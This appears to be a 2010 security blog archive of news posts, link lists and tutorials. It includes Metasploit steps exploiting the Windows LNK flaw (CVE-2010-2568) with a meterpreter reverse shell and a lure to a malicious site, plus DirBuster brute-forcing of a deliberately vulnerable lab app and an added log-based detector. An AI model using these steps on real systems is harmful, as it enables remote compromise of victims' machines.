Archive for July, 2010

BLACK HAT USA 2010 Archives

Blackhat USA 2010 is over now. For anyone who didn't make it to Blackhat, here are the archives of the PPT and videos of all the presentations.

https://www.blackhat.com/html/bh-us-10/bh-us-10-archives.html

Web Application Security Audit checklists

Below are a few audit checklists which help in securing a web application.

http://msdn.microsoft.com/en-us/library/aa302332.aspx
https://blogs.sans.org/it-audit/checklists/web-application-audit-checklist/
http://www.owasp.org/index.php/Category:OWASP_Testing_Project
https://www.watsonhall.com/methodology/checklists.pl
http://www.bestsecuritytips.com/xfsection+article.articleid+169.htm
http://www.certifiedsecure.eu/checklists/cs-basic-web-application-audit.pdf

Microsoft Releases Advisory to fix LNK Vulnerability

Microsoft has released a complete advisory to fix the LNK vulnerability, with a detailed guide and steps to fix it.

So system administrators, make sure you follow the guide below and secure your systems from this threat.

http://support.microsoft.com/kb/2286198

Exploiting Windows LNK vulnerability (CVE-2010-2568)

A new 0-day exploit has recently been detected which takes advantage of the way Windows incorrectly parses shortcuts, so that malicious code can be executed when the icon of a specially crafted shortcut is displayed. This can be exploited locally through a malicious USB drive, or remotely via network shares and WebDAV. Metasploit has recently pushed the exploit as an msf module. There is still no patch released for this vulnerability.

There are 2 ways to exploit this:

1) Keep the 2 files, the LNK file and the DLL, on the USB stick and run on the victim machine.
2) Or trick the victim into accessing the malicious site.

We will use the 2nd method:

1) svn update (update your msf)
2) use windows/browser/ms10_xxx_windows_shell_lnk_execute
3) set payload windows/meterpreter/reverse_tcp
4) set LHOST 192.168.0.103 (your IP)
5) set LPORT 1427 (any port)
6) exploit

Check out my video demonstrating the above method: Exploiting Windows LNK vulnerability (CVE-2010-2568)

Security Conferences and Events Lists Covering the Information Security Economy

A list of security conferences and event lists, with awesome details covering the information security economy.

http://infosecevents.net/

Brute-forcing directory and file names on web application servers using DirBuster

During a web application pentest, finding the sensitive directories, files and folders is always quite tough work.

What is DirBuster

DirBuster is a multi-threaded Java application designed to brute force directory and file names on web/application servers. It is often the case that what looks like a web server in a state of default installation is actually not, and has pages and applications hidden within. DirBuster attempts to find these.

http://www.owasp.org/index.php/Category:OWASP_DirBuster_Project

Now I will show how to use DirBuster to find sensitive directories and files in a web application. For the demo I will be using Mutillidae: A Deliberately Vulnerable Set Of PHP Scripts That Implement The OWASP Top 10.

  1. cd /pentest/web/dirbuster
  2. root@punter:/pentest/web/dirbuster# java -jar DirBuster-0.12.jar -u http://192.168.0.103/mutillidae/

Now browse and select the directory brute-force list, e.g. directory-list-1.0.txt.

Now press the Start button and you will see DirBuster start brute-forcing the directories and files.

See the results: it has found /mutillidae/passwords/accounts.txt
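
A defender's view of the scan above, as an added example that is not part of the original post: it reads access-log lines in combined format, flags clients whose requests are mostly 404s, and lists the paths that answered 2xx during the scan. The log lines, client addresses, thresholds and the "DirBuster" User-Agent match are assumptions constructed for illustration.

```python
import re
from collections import defaultdict

# Apache/nginx "combined" access-log format
LINE_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"')

def build_sample_log():
    """Constructed sample: one client guessing paths, one ordinary visitor."""
    fmt = ('{ip} - - [20/Jul/2010:10:00:{s:02d} +0000] '
           '"GET {p} HTTP/1.1" {st} 512 "-" "{ua}"')
    scan_ua = "DirBuster-0.12 (constructed sample UA)"  # assumed UA string
    words = ["admin", "backup", "cgi-bin", "config", "db", "images",
             "inc", "logs", "old", "private", "test", "tmp"]
    lines = [fmt.format(ip="192.168.0.50", s=i, p=f"/mutillidae/{w}/",
                        st=404, ua=scan_ua) for i, w in enumerate(words)]
    lines.append(fmt.format(ip="192.168.0.50", s=12, st=200, ua=scan_ua,
                            p="/mutillidae/passwords/accounts.txt"))
    for i, (p, st) in enumerate([("/mutillidae/index.php", 200),
                                 ("/mutillidae/favicon.ico", 404),
                                 ("/mutillidae/login.php", 200)]):
        lines.append(fmt.format(ip="192.168.0.77", s=20 + i, p=p, st=st,
                                ua="Mozilla/5.0 (constructed)"))
    return lines

def detect_bruteforce(lines, min_404=10, min_ratio=0.8):
    """Flag clients whose traffic is dominated by 404s (path guessing)."""
    stats = defaultdict(lambda: {"total": 0, "nf": 0, "hits": set(), "ua": set()})
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # not a combined-format line
        s = stats[m["ip"]]
        s["total"] += 1
        s["ua"].add(m["ua"])
        if m["status"] == "404":
            s["nf"] += 1
        elif m["status"].startswith("2"):
            s["hits"].add(m["path"])  # a guess that actually exists
    return {ip: {"not_found": s["nf"],
                 "exposed": sorted(s["hits"]),
                 "tool_ua": any("dirbuster" in u.lower() for u in s["ua"])}
            for ip, s in stats.items()
            if s["nf"] >= min_404 and s["nf"] / s["total"] >= min_ratio}

if __name__ == "__main__":
    for ip, f in detect_bruteforce(build_sample_log()).items():
        print(ip, f)
```

Each path in `exposed` answered a guessed request, so it should either be removed from the web root or placed behind access control.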

Nominations for the Pwnie Awards 2010

Nominations are over for the Pwnie Awards 2010, based on the person who discovered the most technically sophisticated and interesting bug.

http://pwnies.com/nominations/

Ekoparty Security Conference September 16-17

The ekoparty is held annually in the Autonomous City of Buenos Aires, where attendees, guests, and related specialists from around the world have the opportunity to engage with technological innovation, vulnerabilities and tools in a relaxed atmosphere of knowledge sharing.

Presentations on Web Application Threats and Security

All the past and updated presentations from Jeremiah Grossman.

The rest of the presentations, documents and videos can be found here:

http://www.slideshare.net/jeremiahgrossman

Metasploit Framework 3.4.1 Released

The Metasploit Project is proud to announce the release of the Metasploit Framework version 3.4.1. As always, you can get it from our downloads page,
